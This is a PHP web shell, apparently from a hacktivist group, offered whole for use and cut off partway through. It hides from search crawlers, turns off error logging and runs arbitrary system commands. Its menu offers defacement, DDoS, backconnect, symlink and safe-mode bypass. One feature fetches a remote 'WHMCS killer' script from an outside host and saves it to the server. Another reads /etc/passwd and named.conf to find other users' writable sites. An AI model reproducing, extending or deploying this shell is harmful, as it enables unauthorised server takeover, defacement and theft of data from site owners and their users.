Sehhl

1.  
2. <?php
3.  
4. /*
5. Web Shell Coded and Design by M0rph1uS
6. WE ARE MAGICIAN HACKTIVIST PHILIPPINES
7.  
8. Like us on Facebook [www.facebook.com/MHphilippines
9. */
10.  
11.  
12. $auth_pass = "6116dc6f4a375cf90fbe530e0b73cc3a"; // Shell Password: Bushet Ka! \n/
13.  
14.  
15.  
16. session_start();
17. error_reporting(0);
18. set_time_limit(0);
19. @set_magic_quotes_runtime(0);
20. @clearstatcache();
21. @ini_set('error_log',NULL);
22. @ini_set('log_errors',0);
23. @ini_set('max_execution_time',0);
24. @ini_set('output_buffering',0);
25. @ini_set('display_errors', 0);
26.  
27.  
28. $color = "#00ff00";
29. $default_action = 'FilesMan';
30. $default_use_ajax = true;
31. $default_charset = 'UTF-8';
32. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
33. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
34. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
35. header('HTTP/1.0 404 Not Found');
36. exit;
37. }
38. }
39.  
40. function login_shell() {
41.  
42. //LOGIN SHELL
43.  
44. ?>
45. <head>
46. <?php
47.  
48. if (isset($_POST['pass'])){
49. echo "<meta http-equiv=\"refresh\" content=\"0; url=http://youjizz.com\" />";
50. }
51. ?>
52. </head>
53.  
54. <html>
55. <head>
56. <title>M0rPh1uS | SHELL</title>
57. <style type="text/css">
58. html {
59. margin: 20px auto;
60. background: #000000;
61. color: green;
62. text-align: center;
63. }
64. header {
65. color: red;
66. margin: 14px auto;
67. }
68. input[type=password] {
69. width: 170px;
70. height: 25px;
71. color: red;
72. background: #000000;
73. border: 1px dotted red;
74. padding: 5px;
75. margin-left: 10px;
76. text-align: center;
77. }
78. </style>
79. </head>
80. <center>
81. <header>
82.  
83. <br><br><br><br><br><br><br><br><br>
84. <font size='100px' color='grey'>MHPH | PR1V SHELL </font><br>
85.  
86. <font size='5px' color='grey'> Magician | Hacktivist | Philippines </font> <br>
87. <font size='4px' color='grey'>'Security is Like a Magic'</font> <br>
88. <br><br>
89. <footer>
90. </header>
91.  
92.  
93. <form method="post">
94. <font size='4px' color='grey'> Password:
95. <input type="password" name="pass">
96.  
97.  
98. <br>
99. <br>
100. <br>
101. <br>
102.  
103. <br>
104. <br>
105.  
106. <br>
107. <br>
108.  
109. <br>
110. <br>
111.  
112. <footer>
113.  
114. <pre> Powered by Magician Hacktivist Philippines
115.  
116.  
117. ::RESPECT::
118. <marquee width=50%>
119.  
120. ANONYMOUS PHILIPPINES - ANONYWOLVES PH - GENERATION X SECURITY TEAM -GAY SEC INTERNATIONAL - ANONGHOST - XAI SYNDICATE - CLAY PH - CYBER SECURITY INTERNATIONAL - PHILIPPINE CYBER WARIORS
121. </marquee>
122.  
123. </form>
124.  
125. </form>
126. <?php
127. exit;
128. }
129. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
130. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
131. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
132. else
133. login_shell();
134.  
135. //END LOGIN SHELL
136.  
137.  
138.  
139.  
140. //DOWNLOAD//
141.  
142. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
143. @ob_clean();
144. $file = $_GET['file'];
145. header('Content-Description: File Transfer');
146. header('Content-Type: application/octet-stream');
147. header('Content-Disposition: attachment; filename="'.basename($file).'"');
148. header('Expires: 0');
149. header('Cache-Control: must-revalidate');
150. header('Pragma: public');
151. header('Content-Length: ' . filesize($file));
152. readfile($file);
153. exit;
154. }
155. //END//
156. ?>
157.  
158.  
159.  
160.  
161. <html>
162. <head>
163. <title>
164. MHPH | SHELL
165. </title>
166. <meta charset="UTF-8">
167.  
168. <style type='text/css'>
169. *{
170. tex-align:center;
171. }
172. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
173. #edix {
174. margin-top:2%;
175. background-color:black 0.7;
176. padding-bottom:1%;
177. padding-top:1%;
178. text-align:center;
179.  
180.  
181. }
182. #info {
183. margin-top:4%;
184. margin-left:5%;
185. margin-right:5%;
186. background-color:black;
187. padding-bottom:1%;
188. padding-left:4%;
189. padding-top:1%;
190.  
191.  
192.  
193. }
194. #edi {
195.  
196. letter-spacing: 4px;
197. color:white;
198. padding-bottom:1%;
199. padding-top:1%;
200. text-align:center;
201. background-color:black 0.7;
202. border:2px solid white;
203.  
204. }
205. #edi:hover {
206. border:none;
207. border-bottom:3px solid white;
208. background:black;
209. color:white;
210.  
211. }
212. #upx {
213. margin:auto;
214. background-color:black;
215.  
216.  
217. padding-bottom:1%;
218. padding-top:1%;
219. text-align:center;
220.  
221.  
222. }
223. #upx:hover {
224. border:1px solid white;
225. }
226. #ecc {
227.  
228. margin-left:15%;
229. margin-right:15%;
230. padding-bottom:1%;
231.  
232.  
233. }
234.  
235. #dpgen {
236. margin:4%;
237. margin-bottom:0;
238. width:60%;
239. background-color:transparent;
240. margin-top:0;
241. padding:2%;
242.  
243.  
244. }
245.  
246. html
247. {
248. color: white;
249. font-family: 'Ubuntu';
250. background-image:url("data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=");
251.  
252. }
253.  
254. li
255. {display: inline;
256. margin: 5px;
257. padding: 5px;
258. }
259.  
260. table, th, td
261. {
262.  
263.  
264. background: url('');
265. background-color: transparent;
266. border-collapse:collapse;
267.  
268.  
269.  
270. }
271.  
272. th
273. {
274. background:black;
275. color:white;
276. padding: 5px;
277.  
278. }
279. .table_home, .th_home, .hp_home
280. {
281. border-bottom: 1px solid white;
282. }
283. td:hover {
284. background-color:black;
285. }
286. th:hover {
287. border-bottom:3px solid white;
288. }
289. b {
290. color:white:
291. }
292. b:hover {
293. color:white;
294. }
295. x
296. {
297. color:white;
298. background:black;
299. padding:2px;
300. border:none;
301. border-bottom:1px solid white;
302.  
303. }
304. x:hover
305. {
306. border-bottom:3px solid white;
307. text-decoration:none;
308.  
309. }
310. input[type=text], input[type=password],input[type=submit]
311. {
312. background: black;
313.  
314. color: white;
315. border:none;
316. border-bottom: 1px solid white;
317. margin: 5px auto;
318. padding-left: 5px;
319. font-family: '';
320.  
321. }
322. input:focus{
323. box-shadow:1px 1px 35px 1px black;
324. border:none;
325. border-bottom:1px solid white;
326. outline:none;
327. }
328.  
329. textarea
330. {
331. border: 1px solid white;
332. width: 50%;
333. height: 250px;
334. padding-left: 5px;
335. margin: 10px auto;
336. resize: none;
337. background: black;
338. color: white;
339.  
340.  
341. }
342. textarea:focus {
343. box-shadow:1px 1px 12px 1px black;
344. outline:none;
345. border:0.1px solid white;
346. resize: none;
347.  
348. }
349.  
350. select
351. {
352. width: 152px;
353. background: black;
354. color: white;
355. border: 1px solid white;
356. margin: 5px auto;
357. padding-left: 5px;
358. font-family: '';
359. font-size: 13px;
360. }
361.  
362. option:hover
363. {
364. background: white;
365. color: #000000;
366. }
367. a {
368. text-decoration:none;
369. color:white;
370. }
371. a:hover {
372. color:red;
373. }
374. #groups {
375. margin:10px 0 0 0;
376. padding:1% 0 0 0;
377.  
378. }
379. button:hover{
380. border-bottom:3px solid white;
381. text-decoration:none;
382.  
383. }
384. button {
385. color:white;
386. background:black;
387. padding:1%;
388. border:none;
389. border-bottom:1px solid white;
390. }
391.  
392. #upl > input {
393. background-color:black;
394. border:1px solid white;
395. padding:6px;
396. }
397.  
398. #hhed {
399. padding-left:1%;
400. padding-top:5px;
401. border:1px solid white;
402. padding-bottom:6px;
403. max-width:100%;
404. border-collapse: collapse;
405. overflow:hidden;
406. border-bottom:0;
407.  
408.  
409. }
410. #hheds {
411. padding-left:1%;
412. padding-top:5px;
413. border:1px solid white;
414.  
415. padding-bottom:6px;
416. max-width:100%;
417.  
418. }
419. #hhed > b:first-child:hover {
420. border-bottom:2px solid white;
421. color:white;
422. }
423.  
424. h4 {
425. margin-top:15px;
426. }
427.  
428. </style>
429.  
430.  
431. </head>
432.  
433.  
434. <body>
435.  
436.  
437. <?php
438.  
439. function w($dir,$perm) {
440. if(!is_writable($dir)) {
441. return "<font color=red>Not Writable/Readable</font>";
442. } else {
443. return "Writable/Readable";
444. }
445. }
446. function r($dir,$perm) {
447. if(!is_readable($dir)) {
448. return "<font color=red>".$perm."</font>";
449. } else {
450. return "<font color=white>".$perm."</font>";
451. }
452. }
453. function exe($cmd) {
454. if(function_exists('system')) {
455. @ob_start();
456. @system($cmd);
457. $buff = @ob_get_contents();
458. @ob_end_clean();
459. return $buff;
460. } elseif(function_exists('exec')) {
461. @exec($cmd,$results);
462. $buff = "";
463. foreach($results as $result) {
464. $buff .= $result;
465. } return $buff;
466. } elseif(function_exists('passthru')) {
467. @ob_start();
468. @passthru($cmd);
469. $buff = @ob_get_contents();
470. @ob_end_clean();
471. return $buff;
472. } elseif(function_exists('shell_exec')) {
473. $buff = @shell_exec($cmd);
474. return $buff;
475. }
476. }
477.  
478.  
479. // ==========================================================
480. // =====[MAGICIAN HACKTIVIST PHILIPPINES PRIVATE SHELL]======
481. // =====SHELL RECODED BY [M0RPH1US] CREDITS TO [XLEGION]=====
482. // GREETZ | TO ALL FILIPINO HAXXORS |
483. // EXPECT THE UNEXPECTED!
484. // ==========================================================
485.  
486.  
487. /* © To This Function @google */
488. function perms($file){
489. $perms = fileperms($file);
490. if (($perms & 0xC000) == 0xC000) {
491. // Socket
492. $info = 's';
493. } elseif (($perms & 0xA000) == 0xA000) {
494. // Symbolic Link
495. $info = 'l';
496. } elseif (($perms & 0x8000) == 0x8000) {
497. // Regular
498. $info = '-';
499. } elseif (($perms & 0x6000) == 0x6000) {
500. // Block special
501. $info = 'b';
502. } elseif (($perms & 0x4000) == 0x4000) {
503. // Directory
504. $info = 'd';
505. } elseif (($perms & 0x2000) == 0x2000) {
506. // Character special
507. $info = 'c';
508. } elseif (($perms & 0x1000) == 0x1000) {
509. // FIFO pipe
510. $info = 'p';
511. } else {
512. // Unknown
513. $info = 'u';
514. }
515. // Owner
516. $info .= (($perms & 0x0100) ? 'r' : '-');
517. $info .= (($perms & 0x0080) ? 'w' : '-');
518. $info .= (($perms & 0x0040) ?
519. (($perms & 0x0800) ? 's' : 'x' ) :
520. (($perms & 0x0800) ? 'S' : '-'));
521. // Group
522. $info .= (($perms & 0x0020) ? 'r' : '-');
523. $info .= (($perms & 0x0010) ? 'w' : '-');
524. $info .= (($perms & 0x0008) ?
525. (($perms & 0x0400) ? 's' : 'x' ) :
526. (($perms & 0x0400) ? 'S' : '-'));
527. // World
528. $info .= (($perms & 0x0004) ? 'r' : '-');
529. $info .= (($perms & 0x0002) ? 'w' : '-');
530. $info .= (($perms & 0x0001) ?
531. (($perms & 0x0200) ? 't' : 'x' ) :
532. (($perms & 0x0200) ? 'T' : '-'));
533. return $info;
534. }
535.  
536.  
537. //END GOOGLE FUCNTIONS
538.  
539. //HDD FUNCTION -M0RPH1US
540. function hdd($s) {if($s >= 1073741824)
541. return sprintf('%1.2f',$s / 1073741824 ).' GB';
542. elseif($s >= 1048576)
543. return sprintf('%1.2f',$s / 1048576 ) .' MB';
544. elseif($s >= 1024)
545. return sprintf('%1.2f',$s / 1024 ) .' KB';
546. else
547. return $s .' B';
548. }
549. function MHPH($param, $hp1, $hp2){
550. if(strpos($param, $hp1) === FALSE) return FALSE;
551. if(strpos($param, $hp2) === FALSE) return FALSE;
552. $start = strpos($param, $hp1) + strlen($hp1);
553. $end = strpos($param, $hp2, $start);
554. $return = substr($param, $start, $end - $start);
555. return $return;
556. }
557. function getsource($url) {
558. $curl = curl_init($url);
559. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
560. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
561. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
562. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
563. $content = curl_exec($curl);
564. curl_close($curl);
565. return $content;
566. }
567. if(get_magic_quotes_gpc()) {
568. function idx_ss($array) {
569. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
570. }
571. $_POST = idx_ss($_POST);
572. $_COOKIE = idx_ss($_COOKIE);
573. }
574.  
575. if(isset($_GET['dir'])) {
576. $dir = $_GET['dir'];
577. chdir($dir);
578. } else {
579. $dir = getcwd();
580. }
581.  
582. //My IP
583. $clientip = $_SERVER['REMOTE_ADDR'];
584.  
585. //KERNEL
586. $kernel = php_uname();
587.  
588. //SERVER IP
589. $ip = gethostbyname($_SERVER['HTTP_HOST']);
590.  
591. //DIR
592. $dir = str_replace("\\","/",$dir);
593.  
594. //SCDIR
595. $scdir = explode("/", $dir);
596.  
597. //FREESPACE
598. $freespace = hdd(disk_free_space("/"));
599.  
600. //TOTAL
601. $total = hdd(disk_total_space("/"));
602.  
603. //USED
604. $used = $total - $freespace;
605.  
606. //SAFEMODE
607. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=white>OFF</font>";
608.  
609. //DISABLE FUNCTIONS
610. $ds = @ini_get("disable_functions");
611.  
612. //MYSQL
613. $mysql = (function_exists('mysql_connect')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
614.  
615. //CURL
616. $curl = (function_exists('curl_version')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
617.  
618. //WGET
619. $wget = (exe('wget --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
620.  
621. //PERL
622. $perl = (exe('perl --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
623.  
624. //PYTHON
625. $python = (exe('python --help')) ? "<font color=white>ON</font>" : "<font color=red>OFF</font>";
626.  
627. //SHOW DISABLE FUNCTION
628. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=white>NONE</font>";
629. if(!function_exists('posix_getegid')) {
630. $user = @get_current_user();
631. $uid = @getmyuid();
632. $gid = @getmygid();
633. $group = "?";
634. } else {
635. $uid = @posix_getpwuid(posix_geteuid());
636. $gid = @posix_getgrgid(posix_getegid());
637. $user = $uid['name'];
638. $uid = $uid['uid'];
639. $group = $gid['name'];
640. $gid = $gid['gid'];
641. }
642.  
643.  
644. // ===============================
645. // ===============================
646.  
647.  
648. //WELCOME TO OUR SHELL!
649.  
650. echo
651. "
652. <table>
653.  
654.  
655. <font size='40px' color='grey'>MHPH | PR1V SHELL </font><br>
656.  
657. <font size='5px' color='grey'> Magician | Hacktivist | Philippines </font> <br>
658. <font size='4px' color='grey'>'Security is Like a Magic'</font> <br>
659.  
660.  
661. <hr>
662.  
663. <tr>
664. <td>System:".$kernel."</td>
665.  
666. </tr>
667. <tr>
668. <td>".w($dir, perms($dir))." | Safe Mode: $sm </td>
669. </tr>
670. <tr>
671. <td>SERVER IP: <font color=white>".$ip."</font> | MY IP: <font color=white>".$_SERVER['REMOTE_ADDR']."</font>
672. </td></tr>
673. <tr>
674. <td>
675. HDD: <font color=white>$used</font> / <font color=white>$total</font> ( Free: <font color=white>$freespace</font> )</td></tr>
676. <tr>
677. <td>
678. MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>
679. <tr>
680. <td>
681. Disable Functions: $show_ds
682. </td>
683. </tr>
684. </table>
685. <hr>
686. Directory :
687. ";
688.  
689. foreach($scdir as $c_dir => $cdir) {
690. echo "<a href='?dir=";
691. for($i = 0; $i <= $c_dir; $i++) {
692. echo $scdir[$i];
693. if($i != $c_dir) {
694. echo "/";
695. }
696. }
697. echo "'><x>$cdir</x></a> / ";
698. }
699. echo "
700.  
701.  
702. ";
703.  
704. // END WELCOME \m/
705.  
706.  
707.  
708. // ===========
709. // GROUPS
710. // ===========
711.  
712.  
713.  
714.  
715. echo "
716.  
717. <hr>
718.  
719. <center>
720.  
721. <a href='?'><button>Home</button></a>
722. <a href='?do=phpinfo'><button>PHP Info</button>
723. </a>
724. <a href='?dir=$dir&do=upload'><button>Upload</button></a>
725. <a href='?dir=$dir&do=cmd'><button>Command</button></a>
726. <a href='?dir=$dir&do=fakeroot'><button>Fakeroot</button></a>
727.  
728. <a href='?do=dbdump'><button>DB_DUMP</button></a>
729. <a href='?do=hash'><button>String Tools</button></a>
730. <a href='?dir=$dir&do=backconnect'><button>Network</button></a>
731. <a href='?dir=$dir&do=mass'><button>Mass Add</button></a>
732. <a href='?dir=$dir&do=massd'><button>Mass Delete</button></a>
733.  
734. <a href='?dir=$dir&do=mailer'><button>Mhph Mailer</button></a>
735. <a href='?dir=$dir&do=revs'><button>WP Config</button></a>
736.  
737. <a href='?dir=$dir&do=shellfind'><button>Shell Finder</button></a>
738. <a href='?dir=$dir&do=zoneh'><button>Auto ZoneH</button></a>
739.  
740. <a href='?dir=$dir&do=defid'><button>DefacerID</button></a>
741.  
742. <a href='?dir=$dir&do=whois'><button>Whois</button></a>
743. <a href='?dir=$dir&do=wpautouser'><button>WP Auto change User</button></a>
744.  
745. <a href='?dir=$dir&do=auto_dwp'><button>WP auto Def</button></a>
746. <a href='?dir=$dir&do=auto_dwp2'><button>WP auto Def 2</button></a>
747. <a href='?dir=$dir&do=autojoomla'><button>Joomla Auto Change User</button></a>
748.  
749.  
750.  
751.  
752. <a href='?dir=$dir&do=vbic'><button>Vb Index Changer</button></a>
753. <a href='?dir=$dir&do=smtp'><button>SMTP</button></a>
754.  
755. <a href='?dir=$dir&do=ddos'><button>DD0S </button></a>
756.  
757.  
758. <a href='?dir=$dir&do=passwbypass'><button>Password Bypass</button></a>
759. <a href='?dir=$dir&do=whcms'><button>WHCMS</button></a>
760. <a href='?dir=$dir&do=kill'><button>Kill</button></a>
761. <a href='?dir=$dir&do=port'><button>Port Scanner</button></a>
762. <a href='?dir=$dir&do=autouser'><button>Auto Edit User</button></a>
763.  
764. <a href='?dir=$dir&do=jumping'><button>Jumping</button>
765. <a href='?dir=$dir&do=cpanel'><button>Cpanel</button>
766. <a href='?dir=$dir&do=config'><button>Config</button>
767. <a href='?dir=$dir&do=adminer'><button>Adminer</button>
768. <a href='?dir=$dir&do=bypasssafemode'><button>Bypass Safemode</button>
769. <a href='?dir=$dir&do=krdp_shell'><button>Krdp Shell</button>
770. <a href='?dir=$dir&do=cgi'><button>CGI Telnet</button>
771. <a href='?dir=$dir&do=symlink'><button>Symlink</button>
772. <a href='?dir=$dir&do=symconfig'><button>Symlink2</button>
773. <a href='?dir=$dir&do=network'><button>Network</button>
774. </a>
775.  
776. <a href='?about=ph'><button>About MHPH</button>
777.  
778. <a href='?dir=$dir&do=page'><button>Our Page</button>
779.  
780. </a>
781. <a href='?logout=true'><button>Log Out</button></a>
782. <hr>
783.  
784. <center>
785. ";
786.  
787.  
788. // END GROUPS //
789.  
790.  
791. //LOGOUT SHELL//
792.  
793.  
794. if($_GET['logout'] == true) {
795. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
796.  
797. echo"<script>window.location='?'; alert(\"Goodbye \m/\");</script>";}
798.  
799.  
800. // END LOGOUT //
801.  
802.  
803. //WHCMS
804. elseif($_GET['do'] == 'whcms'){
805.  
806. echo '<br><center><span style=" font-family:Fredericka the Great; color:white">Generate WHMCS KILLER Script</span><center><br>';
807. error_reporting(0);
808. echo "<form method='POST'>
809. <p width='20' height='20'align='center'>
810.  
811. <center><font color='white' size='2' face='shell'>CWD:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><input type='text' size='40' name='zero' value=".dirname(__FILE__)." <font color='white' size='8' face='Tahoma'></font></center><br>
812. <center><font color='white' size='2' face='shell'>SCRIPT:&nbsp;&nbsp;&nbsp;</font><input type='text' size='40' name='shell' value='http://tny.cz/cd97a082/save.php?hash=f5388dca645d5a6cda8e78c52bdf6a8b' <font color='white' size='8' face='Tahoma'></font></center>
813.  
814. <p><center><input type='submit' value='Generate Now' name='start' <font color=white' face='Tahoma, Geneva, sans-serif' style='font-size: 12pt'></font></center></p>";
815. echo "<p><center><textarea width=20% height=20%>
816.  
817. Results Will Appear Here Link :
818. https://raw.githubusercontent.com/BDLeet/Mixed-Hacking-Script-Collection/master/whmcs%20killer%20v3.php
819.  
820.  
821. ~M0rph1us @ Mhph
822. ";
823. if($_POST['start']) {
824. $zero = $_POST['zero'];
825. $file = $_POST['shell'];
826.  
827. $dir = "whmcs";
828. if(file_exists($dir)) {
829. echo " WHMCS Folder Already Exist!\n";
830. } else {
831. @mkdir($dir); {
832. echo " WHMCS Folder Has Been Created !\n";
833. }
834. }
835. #Generate WHMCS Script
836. $fopen = fopen("whmcs/whmcs.php",'w');
837. $shell = @file_get_contents($file);
838. $swrite = fwrite($fopen ,$shell);
839. if($swrite){
840. echo "WHMCS Script Has Been Downloaded @ $zero/whmcs/whmcs.php \n";
841.  
842. } else {
843. echo "Can't Generate \n";
844. }
845. fclose($fopen);
846. }
847.  
848. echo "</textarea></center></p>";
849. $rt="<br><a href=whmcs/whmcs.php TARGET='_blank'><b>
850. LINK</b></a>";
851. echo "<center><br>Click on Button Generate Now and Check link given below for WHMCS Script<br>$rt</center>";
852. footer();
853.  
854. }
855. //END WHCMS
856.  
857. //PHP INFO
858. elseif($_GET['do'] == 'phpinfo'){
859. fwrite(fopen("phpinfo.php","x++"),"<?php phpinfo() ?>");
860.  
861. echo "<center><b>PHP Info </b><br><br><a href='../../phpinfo.php' target='_BLANK'><button>PHP Info</button></a></center><br>";
862. footer();
863. }
864. // END PHP INFO
865.  
866.  
867. // ADMINER //
868.  
869. elseif($_GET['do'] == 'adminer') {
870. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
871. function adminer($url, $isi) {
872. $fp = fopen($isi, "w");
873. $ch = curl_init();
874. curl_setopt($ch, CURLOPT_URL, $url);
875. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
876. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
877. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
878. curl_setopt($ch, CURLOPT_FILE, $fp);
879. return curl_exec($ch);
880. curl_close($ch);
881. fclose($fp);
882. ob_flush();
883. flush();
884. }
885. if(file_exists('adminer.php')) {
886. echo "<center><br><br><pre align=center><a href='adminer.php' target='_blank'>
887. <button>ADMINER LOG IN</button></a></pre><br><br>";
888. } else {
889. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
890. echo "<center><br><br><a href='adminer.php' target='_blank'><button>Adminer Login </button></a><br><br>";
891. } else {
892. echo "<center><button>Failed</button></center>";
893. }
894. }
895. footer();
896. }
897.  
898. // "END ADMINER" //
899.  
900.  
901. //JUMPING
902. elseif($_GET['do'] == 'jumping') {
903. $i = 0;
904. echo "<div class='margin: 5px auto;'>";
905. if(preg_match("/hsphere/", $dir)) {
906. $urls = explode("\r\n", $_POST['url']);
907. if(isset($_POST['jump'])) {
908. echo "<pre>";
909. foreach($urls as $url) {
910. $url = str_replace(array("http://","www."), "", strtolower($url));
911. $etc = "/etc/passwd";
912. $f = fopen($etc,"r");
913. while($gets = fgets($f)) {
914. $pecah = explode(":", $gets);
915. $user = $pecah[0];
916. $dir_user = "/hsphere/local/home/$user";
917. if(is_dir($dir_user) === true) {
918. $url_user = $dir_user."/".$url;
919. if(is_readable($url_user)) {
920. $i++;
921. $jrw = "<center>[<font color=white>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a></center>";
922. if(is_writable($url_user)) {
923. $jrw = "<center>[<font color=white>RW</font>] <a href='?dir=$url_user'><font color=white>$url_user</font></a></center>";
924. }
925. echo $jrw."<br>";
926. }
927. }
928. }
929. }
930. if($i == 0) {
931. } else {
932. echo "<br>Total @ ".$i." = ".$ip;
933. }
934. echo "</pre>";
935.  
936. } else {
937. echo '<center>
938. <form method="post">
939. List Domains: <br>
940. <textarea name="url" style="width: 500px; height: 250px;">';
941. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
942. while($getss = fgets($fp)) {
943. echo $getss;
944. }
945. echo '</textarea><br>
946. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
947. </form></center>';
948. }
949. } elseif(preg_match("/vhosts|vhost/", $dir)) {
950. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
951. $urls = explode("\r\n", $_POST['url']);
952. if(isset($_POST['jump'])) {
953. echo "<pre>";
954. foreach($urls as $url) {
955. $url = str_replace("www.", "", $url);
956. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
957. if(is_dir($web_vh) === true) {
958. if(is_readable($web_vh)) {
959. $i++;
960. $jrw = "<center>[<font color=white>R</font>] <a href='?dir=$web_vh'><font color=white>$web_vh</font></a></center>";
961. if(is_writable($web_vh)) {
962. $jrw = "<center>[<font color=white>RW</font>] <a href='?dir=$web_vh'><font color=white>$web_vh</font></a></center>";
963. }
964. echo $jrw."<br>";
965. }
966. }
967. }
968. if($i == 0) {
969. } else {
970. echo "<br>Total @ ".$i." = ".$ip;
971. }
972. echo "</pre>";
973. } else {
974. echo '<center>
975. <form method="post">
976. List Domains: <br>
977. <textarea name="url" style="width: 500px; height: 250px;">';
978. bing("ip:$ip");
979. echo '</textarea><br>
980. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
981. </form></center>';
982. }
983. } else {
984. echo "<pre align=center>";
985. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font><hr>");
986.  
987. while($passwd = fgets($etc)) {
988. if($passwd == '' || !$etc) {
989. echo "<font color=red>Can't read /etc/passwd</font>";
990.  
991. } else {
992. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
993. foreach($user_jumping[1] as $user_idx_jump) {
994. $user_jumping_dir = "/home/$user_idx_jump/public_html";
995. if(is_readable($user_jumping_dir)) {
996. $i++;
997. $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=white>$user_jumping_dir</font></a>";
998. if(is_writable($user_jumping_dir)) {
999. $jrw = "<center>[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=white>$user_jumping_dir</font></a></center>";
1000. }
1001. echo $jrw;
1002. if(function_exists('posix_getpwuid')) {
1003. $domain_jump = file_get_contents("/etc/named.conf");
